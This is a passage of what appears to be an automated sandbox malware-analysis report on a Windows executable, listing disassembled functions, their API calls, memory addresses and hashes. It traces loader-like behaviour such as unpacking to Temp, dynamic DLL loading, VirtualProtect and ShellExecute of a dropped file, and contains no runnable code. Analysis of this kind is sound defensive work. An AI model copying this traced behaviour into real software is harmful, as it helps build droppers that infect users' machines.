                                            • Part of subcall function 0040501F: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00402C51,00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00000000,00000000,00000000), ref: 0040507B
                                            • Part of subcall function 0040501F: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll), ref: 0040508D
                                            • Part of subcall function 0040501F: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050B3
                                            • Part of subcall function 0040501F: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004050CD
                                            • Part of subcall function 0040501F: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050DB
                                          • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FA3
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
                                          • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D
                                          Similarity
                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                          • String ID:
                                          • API String ID: 2987980305-0
                                          • Opcode ID: 8405f33e14f9c3f15d0e520106e072150188c144eaeb8d7ef96d34cccaac7bda
                                          • Instruction ID: 23a464ffe6ca8440643a385a127484fd4ee8ad6b227fb7efa4d26ad3fc5b3ac3
                                          • Opcode Fuzzy Hash: 8405f33e14f9c3f15d0e520106e072150188c144eaeb8d7ef96d34cccaac7bda
                                          • Instruction Fuzzy Hash: D7210872904211BACF107FA48E49A6E39B0AB44358F60823BF601B62D1D7BC4941AA6E
                                          APIs
                                            • Part of subcall function 00405FA1: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ulACwpUCSU.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76CD3410,004033C9), ref: 00405FF9
                                            • Part of subcall function 00405FA1: CharNextA.USER32(?,?,?,00000000), ref: 00406006
                                            • Part of subcall function 00405FA1: CharNextA.USER32(?,"C:\Users\user\Desktop\ulACwpUCSU.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76CD3410,004033C9), ref: 0040600B
                                            • Part of subcall function 00405FA1: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76CD3410,004033C9), ref: 0040601B
                                          • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76CD3410,004033C9), ref: 00403204
                                          Strings
                                          Similarity
                                          • API ID: Char$Next$CreateDirectoryPrev
                                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 4115351271-1726532035
                                          • Opcode ID: ee23c129dd8a5d49f4f649e38bc420fd14e59507522fd77197c34cef7b8656a6
                                          • Instruction ID: 89773af62672bbf6302d30782f314b1c1bc42d6855f09756152acd8bf908297a
                                          • Opcode Fuzzy Hash: ee23c129dd8a5d49f4f649e38bc420fd14e59507522fd77197c34cef7b8656a6
                                          • Instruction Fuzzy Hash: 24D0C71290AD3066D5513B6A7C46FCF050C8F4675DF11807BF904751C58F6C555395EF
                                          APIs
                                          • SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000,00409130,?), ref: 00402F45
                                          • WriteFile.KERNELBASE(00000000,004128A0,?,000000FF,00000000,004128A0,00004000,00409130,00409130,00000004,00000004,00000000,00000000,?,?), ref: 00402FD2
                                          Similarity
                                          • API ID: File$PointerWrite
                                          • String ID:
                                          • API String ID: 539440098-0
                                          APIs
                                          • GlobalFree.KERNEL32(00000000), ref: 00401B80
                                          • GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401B92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Global$AllocFree
                                          • String ID: Call
                                          • API String ID: 3394109436-1824292864
                                          APIs
                                            • Part of subcall function 0040603A: FindFirstFileA.KERNELBASE(?,00421548,Invaliditetsprocent209\indoktrineringen.rec,004058F7,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,00000000,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,?,?,76CD2EE0,00405616,?,C:\Users\user\AppData\Local\Temp\,76CD2EE0), ref: 00406045
                                            • Part of subcall function 0040603A: FindClose.KERNEL32(00000000), ref: 00406051
                                          • lstrlenA.KERNEL32 ref: 004021CA
                                          • lstrlenA.KERNEL32(00000000), ref: 004021D4
                                          • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 004021FC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: FileFindlstrlen$CloseFirstOperation
                                          • String ID:
                                          • API String ID: 1486964399-0
                                          APIs
                                            • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,00000168,00000000,00000022,00000000,?,?), ref: 00402B2F
                                          • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402468
                                          • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 0040247B
                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso2EBB.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Enum$CloseOpenValue
                                          • String ID:
                                          • API String ID: 167947723-0
                                          APIs
                                          • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Stillse\Limejuice\Saereste,?), ref: 00401E1E
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Stillse\Limejuice\Saereste, xrefs: 00401E09
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: ExecuteShell
                                          • String ID: C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Stillse\Limejuice\Saereste
                                          • API String ID: 587946157-994438828
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2905161694.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2905123603.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000000.00000002.2905192299.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000000.00000002.2905221858.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: EnumErrorLastWindows
                                          • String ID:
                                          • API String ID: 14984897-0
                                          APIs
                                            • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,00000168,00000000,00000022,00000000,?,?), ref: 00402B2F
                                          • RegQueryValueExA.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004023F8
                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso2EBB.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID:
                                          • API String ID: 3677997916-0
                                          APIs
                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                          • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          APIs
                                            • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,00000168,00000000,00000022,00000000,?,?), ref: 00402B2F
                                          • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 004022DF
                                          • RegCloseKey.ADVAPI32(00000000), ref: 004022E8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: CloseDeleteOpenValue
                                          • String ID:
                                          • API String ID: 849931509-0
                                          APIs
                                          • ShowWindow.USER32(000104BA), ref: 00401579
                                          • ShowWindow.USER32(000104B4), ref: 0040158E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: ShowWindow
                                          • String ID:
                                          • API String ID: 1268545403-0
                                          APIs
                                          • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DC2
                                          • EnableWindow.USER32(00000000,00000000), ref: 00401DCD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Window$EnableShow
                                          • String ID:
                                          • API String ID: 1136574915-0
                                          APIs
                                          • GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\ulACwpUCSU.exe,80000000,00000003), ref: 004059CB
                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059ED
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: File$AttributesCreate
                                          • String ID:
                                          • API String ID: 415043291-0
                                          APIs
                                          • GetFileAttributesA.KERNELBASE(?,?,004055BA,?,?,00000000,0040579D,?,?,?,?), ref: 004059A7
                                          • SetFileAttributesA.KERNEL32(?,00000000), ref: 004059BB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 9001e84463e5b3d4dd00ca1d2e00f3bb66c1d6c16300b22364f3152d7eb201de
                                          • Instruction ID: a98ca5448702c3e829ea1667e49b0be7f6aa4c87fef4348ac0342a167d80fd98
                                          • Opcode Fuzzy Hash: 9001e84463e5b3d4dd00ca1d2e00f3bb66c1d6c16300b22364f3152d7eb201de
                                          • Instruction Fuzzy Hash: 19D0C9B2918120EBC2102728AD0889BBF69EB542717018B31F865A22B0C7304C52DAA9
                                          APIs
                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402274
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: PrivateProfileStringWrite
                                          • String ID:
                                          • API String ID: 390214022-0
                                          • Opcode ID: 9ff6483e56f83e050050973c75d29e7e6846100e3a8c6593062fb544488b0e4d
                                          • Instruction ID: 05d4d75dbd01593bae97f630dbecede8c42f44da552b6d0f9ca4defc7305ba5b
                                          • Opcode Fuzzy Hash: 9ff6483e56f83e050050973c75d29e7e6846100e3a8c6593062fb544488b0e4d
                                          • Instruction Fuzzy Hash: 2FE04F72B001696ADB903AF18F8DD7F21597B84304F15067EF611B62C2D9BC0D81A2B9
                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(00000000,00000168,00000000,00000022,00000000,?,?), ref: 00402B2F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: ebfeba3ed9c8d95cb46d76ca19a6c1a04daa5e79448631d0a062a8db0bedbb5d
                                          • Instruction ID: 087740a894708ae54e311fe38564fcb001a0ed9e3d0f4d4a62d19f1d4de25a1d
                                          • Opcode Fuzzy Hash: ebfeba3ed9c8d95cb46d76ca19a6c1a04daa5e79448631d0a062a8db0bedbb5d
                                          • Instruction Fuzzy Hash: 38E046B6250108AADB40EFA4EE4AF9537ECFB04700F008021BA08E7091CA78E5509B69
                                          APIs
                                          • ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,004128A0,0040A8A0,004031C9,00409130,00409130,004030BB,004128A0,00004000,?,00000000,?), ref: 00405A53
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 36ce21e0183dc59356ed1b7b138b7ffe2bb5c4fd6ccae5392a8977301763c5ee
                                          • Instruction ID: 55609983f428609d3339a900fe5ea2c3161a13bcf9e808ef2cae39733250456b
                                          • Opcode Fuzzy Hash: 36ce21e0183dc59356ed1b7b138b7ffe2bb5c4fd6ccae5392a8977301763c5ee
                                          • Instruction Fuzzy Hash: F7E08C3231025AABDF109EA09C40AEB3B6CEB00760F084432FA14E2040D230E9218FA5
                                          APIs
                                          • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 1000272D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2905161694.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2905123603.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000000.00000002.2905192299.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000000.00000002.2905221858.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                          • Instruction ID: 4dab7c069dd6fc30f8915db09394f7f991a1b088a201bba37056324bf7fcc065
                                          • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                          • Instruction Fuzzy Hash: 98F09BF19092A0DEF360DF688CC47063FE4E3993D5B03852AE358F6269EB7441448B19
                                          APIs
                                          • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022B2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: PrivateProfileString
                                          • String ID:
                                          • API String ID: 1096422788-0
                                          • Opcode ID: f8d132d461a5c4ed5c76335474cd8e98aaa4b1821b9353edac55918b86fd9ae5
                                          • Instruction ID: 1024819f7f1d2ea578916dba6ac29c28ac22902c13986e1de9ff5d702d2d6265
                                          • Opcode Fuzzy Hash: f8d132d461a5c4ed5c76335474cd8e98aaa4b1821b9353edac55918b86fd9ae5
                                          • Instruction Fuzzy Hash: B9E08671A44209BADB406FA08E09EBD3668BF01710F10013AF9507B0D1EBB88442F72D
                                          APIs
                                          • SendMessageA.USER32(000104AE,00000000,00000000,00000000), ref: 0040404A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
                                          • Instruction ID: af7fd4c3fc1dda8ad1a195a9021ea177fcc43fc0d0bb539f8953ea950d20d41d
                                          • Opcode Fuzzy Hash: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
                                          • Instruction Fuzzy Hash: DFC09B717443007BEA31DB509D49F077758A750B00F5584357320F50D0C6B4F451D62D
                                          APIs
                                          • SendMessageA.USER32(00000028,?,00000001,00403E52), ref: 0040402F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
                                          • Instruction ID: 7b5ccc39adf6f72de5191684d4495c6b43ffe58f78915606d69c4a7e6f44d702
                                          • Opcode Fuzzy Hash: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
                                          • Instruction Fuzzy Hash: F3B092B5684200BAEE224B40DD09F457EA2E7A4702F008024B300240B0C6B200A1DB19
                                          APIs
                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA4,?), ref: 004031DA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID:
                                          • API String ID: 973152223-0
                                          • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                          • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                          • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                          • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                          APIs
                                          • KiUserCallbackDispatcher.NTDLL(?,00403DEB), ref: 00404018
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: CallbackDispatcherUser
                                          • String ID:
                                          • API String ID: 2492992576-0
                                          • Opcode ID: caaff2729d3fe7bae5ae998927534049a5cfce9e2193b3926e4c56a419af128c
                                          • Instruction ID: f87940b9544c4de7e657a104dd6f20edac94ef916c9b89b279468f5034d51d6a
                                          • Opcode Fuzzy Hash: caaff2729d3fe7bae5ae998927534049a5cfce9e2193b3926e4c56a419af128c
                                          • Instruction Fuzzy Hash: E2A01231404001DBCB014B10DF04C45FF21B7503007018030E50140034C6310420FF09
                                          APIs
                                          • Sleep.KERNELBASE(00000000), ref: 004014E5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmp
